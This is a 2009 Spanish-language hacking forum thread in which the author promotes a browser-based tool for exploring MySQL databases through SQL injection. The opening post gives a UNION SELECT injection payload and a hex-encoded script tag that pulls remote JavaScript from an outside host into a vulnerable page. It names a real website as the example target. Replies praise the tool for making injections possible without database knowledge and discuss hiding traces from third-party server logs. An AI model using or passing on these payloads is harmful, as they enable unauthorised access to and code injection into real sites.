MySQLi | General Inejction Explorer | By PonyMagic

Iniciado por Pony-Magic, 13 Diciembre 2009, 00:28 AM

0 Miembros y 1 Visitante están viendo este tema.

Pony-Magic

General Injection Explorer 3.0
by PonyMagic

[?] Que es?
Basicamente es un explorador de bases de datos MySQL via SQLi, "incrustado" en la inyeccion.

[!] Que tiene la version 3.0?
  • Codeado desde 0.
  • Bypasseo de "illegal operation", y limite de group_concat_max_len.
  • Mejor manejo de CSS && DIVS.
  • Peticiones realizadas con AJAX.
  • Nueva forma de ver tablas, MUCHO mas ordenadas.

    [?] Como se usa?

    En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
    En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.

    (0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

    Ejemplo:
    adegasgalegas.es SQLi
    adegasgalegas.es GIE SQLi





    Injeccion con General Injection Explorer 3.0

    Luego, se navegan las bases de datos, usando ese "cuadradito" como un mini-phpmyadmin :P como se ve en el siguiente [.gif]:


WHK

#1
Está super bueno, me gustó me gustó me gustó  :D

PD:
Donde dice:
Código (‭‬javascript) [Seleccionar]
document.write("
background: url(
  'http://www.diosdelared.com/blogs/themes/blackcyan/imagenes/bg.jpg'
) #000;z-index:1002;overflow: auto;}
"); // background


Podrías apuntar hacia otra web? xD ya que cuando se incluya esa imagen la referencia de la inyección se enviará a su web dejando en su log de acceso las inyecciones que alguien podría encontrar y utilizar con este script.

A mi me gustaría mucho si pudieras reemplazar el buffer de las imagenes con string en base64 y data/*; o simplemente hacerlo sin imagenes y evitar la dependencia de inclusiones externas.

Pony-Magic

gracias por el dato, lo voy a tener en cuenta!
si alguien tiene alguna critica "constructiva" o no   :P
por favor que comente, asi la proxima queda mejor  :)

braulio--

Es la mejor herramienta para estas labores que he visto.
Tuviste una idea impresionante  ;-) ;-) ;-)

xassiz_




YXVuIGVyZXMgbWF0YWRvIHBhcmEgcG9uZXJ0ZSBhIGRlc2NpZnJhciBlc3RvIHhE

fede_cp

sisi!, esta muy buena, genial.

segui así



saludos
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!

Banti

Grozo!!!
Ahora no necesitas conocimientos de mysql para hacer inyecciones :P

@WHK:
Te pregunto por ignorante...
Que es el buffer de imagen? Y que necesidad para que este cifrado?

YST

Cita de: Vaati en 13 Diciembre 2009, 23:31 PM
Grozo!!!
Ahora no necesitas conocimientos de mysql para hacer inyecciones :P

@WHK:
Te pregunto por ignorante...
Que es el buffer de imagen? Y que necesidad para que este cifrado?

cifra la imagen en base64 y se la pasa al firefox pàra que la muestre :P Sin necesidad de sacarla de alguna web ;)


Yo le enseñe a Kayser a usar objetos en ASM

kamsky

Citarcifra la imagen en base64
Más que cifrar, codificar
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

YST



Yo le enseñe a Kayser a usar objetos en ASM